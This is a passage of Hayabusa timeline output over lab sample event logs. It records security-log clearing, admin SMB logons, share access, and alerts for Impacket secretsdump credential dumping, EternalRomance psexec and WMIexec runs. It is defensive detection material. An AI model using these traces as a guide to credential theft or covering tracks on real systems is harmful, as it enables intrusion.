17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share 
Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 
0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 
+2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin 
Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: 
SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote 
Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret 
dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 